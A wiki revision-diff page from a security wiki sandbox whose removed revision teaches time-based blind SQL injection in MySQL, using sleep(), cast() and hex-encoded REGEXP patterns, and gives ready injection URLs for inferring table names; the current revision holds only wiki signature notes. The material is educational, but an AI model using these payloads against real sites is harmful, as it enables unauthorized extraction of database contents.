Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "User:Mike/Sandbox"

From NetSec
Jump to: navigation, search
(Replaced content with "<nowiki>~~~</nowiki> = default sig (change it in prefs) ~~~ <nowiki>~~~~</nowiki> = sig then time ~~~~ <nowiki>~~~~~</nowiki> = time ~~~~~")
Line 1: Line 1:
===='''Using sleep() to map a table name with regular expressions'''====
+
<nowiki>~~~</nowiki> = default sig (change it in prefs) [[User:Mike|Mike]]
{{protip|<i>'''[[#Advanced:_Using_Regex|Regular expressions]] in mysql don't need quotes, it is interchangeable with [[#Quotes|0x'''hex''']]!'''</i>}}
+
{| class="wikitable" width="90%"
+
|
+
<source lang="sql">  mysql> select table_name from information_schema.tables where table_schema=database() limit 1 offset 0;
+
  +------------+
+
  | table_name |
+
  +------------+
+
  | sample    |
+
  +------------+
+
  1 row in set (0.00 sec)</source>
+
* The first letter of "sample" is '''s''', it isn't between '''a''' and '''m''', therefore it won't sleep at all when we test to see if it is:
+
<source lang="sql">  mysql> select * from sample where id=1 and sleep((select cast(
+
          (select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp '^[a-m]')
+
        as signed) * 15));</source>
+
  Empty set ('''0.00 sec''')
+
  
* However, when we test to see if it's between n-z, because '''s''' is between '''n''' and '''z''' the return output from '''REGEXP''' is multiplied and becomes '''15''', which is passed to the '''sleep()''' function:
+
<nowiki>~~~~</nowiki> = sig then time [[User:Mike|Mike]] 13:01, 2 May 2012 (MSK)
<source lang="sql"> mysql> select * from sample where id=1 and sleep((select cast(
+
          (select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp '^[n-z]')
+
        as signed) * 15));</source>
+
  Empty set ('''15.00 sec''')
+
  
* So, an injection URI that utilizes sleep(), cast(), and '''multiplication''' can be used remotely in cases of unpredictable output and without the need for quotes, commas, comment notation, or standard comparison operators ('''&lt;, &#x3d;, &gt;''') to test if the first character of the first table in the database is between '''a''' and '''m''' would look like:
+
<nowiki>~~~~~</nowiki> = time 13:01, 2 May 2012 (MSK)
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e612d6d) as signed) * 15));
+
 
+
* However the n-z would look like:
+
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e6e2d7a) as signed) * 15));
+
|}
+

Revision as of 10:01, 2 May 2012

~~~ = default sig (change it in prefs) Mike

~~~~ = sig then time Mike 13:01, 2 May 2012 (MSK)

~~~~~ = time 13:01, 2 May 2012 (MSK)